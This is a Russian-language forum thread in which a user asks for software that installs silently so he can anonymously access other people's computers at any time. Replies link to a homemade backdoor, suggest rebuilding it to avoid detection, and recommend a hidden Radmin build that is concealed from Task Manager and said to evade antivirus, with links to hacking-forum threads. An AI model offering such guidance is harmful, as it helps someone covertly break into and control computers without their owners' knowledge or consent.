Для прикола установил себе TeamViewer 5. понравилось лазить по компу у друга.Появилась идея полазить в компе ещё у кого нибудь только анонимно. тимвивер не катит(все эти предупреждения пароли логины и пр) слышал ещё чтото про Radmin сервер но поверхностно. Ребят цель найти прогу которая тихоничко бы ставилась без особого внимания и запускалась удалённо в любое время.
http://mrthe.name/2009/08/simple-backdoor-by-mrthe/ развлекайся. текущая скомпилированная версия, кажется, палится. как собрать догадаешься сам, это делается проще простого. пс. и не вздумай писать мне в пм\асю, я больше не пишу под винду и врядли смогу чем-то помочь.
эээээ.... чувак радмин не палится!!!! это не пиратский софт! на ачате кто-то выкладывал скрытый радмин.
-> Пользуюсь этим года 2, и не раз не подводил(скрыт от диспетчера) Короче кто этим пользовался меня поймёт ДА И ГЛАВНОЕ НЕ ПАЛИТСЯ АНТИВИРЯМИ _hps://forum.antichat.ru/thread36042.html and _ttps://forum.antichat.ru/thread169654.html Море статей, просто нужно немножко включить мозг